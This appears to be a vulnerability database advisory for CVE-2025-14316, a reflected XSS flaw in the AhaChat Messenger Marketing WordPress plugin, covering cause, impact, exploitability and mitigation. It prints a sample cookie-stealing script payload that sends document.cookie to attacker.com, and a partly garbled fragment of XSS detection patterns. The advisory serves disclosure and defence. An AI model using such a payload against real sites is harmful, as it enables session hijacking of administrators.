
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-14316 is a Reflected Cross-Site Scripting (XSS) vulnerability in the AhaChat Messenger Marketing WordPress plugin through version 1.1. The plugin fails to sanitize and escape a user-supplied parameter before reflecting it back in the page output, enabling attackers to inject malicious scripts targeting high-privilege users such as administrators. It was publicly disclosed on January 5, 2026, and assigned a CVSS v3.1 base score of 7.1 (High) (WPScan, Red Hat CVE).
The root cause is improper neutralization of user-controlled input in web page output (CWE-79). The plugin reflects an unsanitized parameter directly into the HTML response without encoding, allowing an attacker to craft a malicious URL containing JavaScript payloads. Exploitation requires user interaction — specifically, a logged-in administrator must be tricked into visiting or submitting a crafted page. A proof-of-concept is publicly available via WPScan, demonstrating that a hidden HTML form with auto-submit can trigger the XSS in the context of an authenticated admin session (WPScan).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of a high-privilege WordPress user (e.g., an administrator), potentially leading to session token theft, credential harvesting, unauthorized administrative actions (such as creating rogue admin accounts or installing malicious plugins), and full site compromise. The changed scope (S:C) in the CVSS vector indicates the impact extends beyond the vulnerable component itself, affecting the broader WordPress environment (WPScan, Red Hat CVE).
A public proof-of-concept is available through WPScan, demonstrating the attack via a crafted HTML page with an auto-submitting form. The EPSS score is approximately 0.029% (0.000290), indicating a low but non-zero probability of exploitation in the wild. No evidence of active in-the-wild exploitation, threat actor attribution, or CISA KEV catalog listing has been reported at this time (WPScan, Red Hat CVE).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>).%3Cscript%3E, onerror=, onload=) in parameter values.As of the disclosure date (January 5, 2026), there is no known fix available for the AhaChat Messenger Marketing plugin — the vulnerability affects all versions through 1.1 with no patched release published (WPScan). Site administrators should immediately deactivate and remove the plugin until a patched version is released. Additionally, implementing a Web Application Firewall (WAF) with XSS filtering rules can help mitigate exploitation risk in the interim.
The vulnerability was reported by researcher Yevgen Goncharuk and verified by WPScan. Wordfence included it in their weekly WordPress vulnerability report for the period of January 26 – February 1, 2026 (Wordfence Blog). No significant broader media coverage or notable community debate has been identified beyond standard vulnerability tracking and aggregation.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."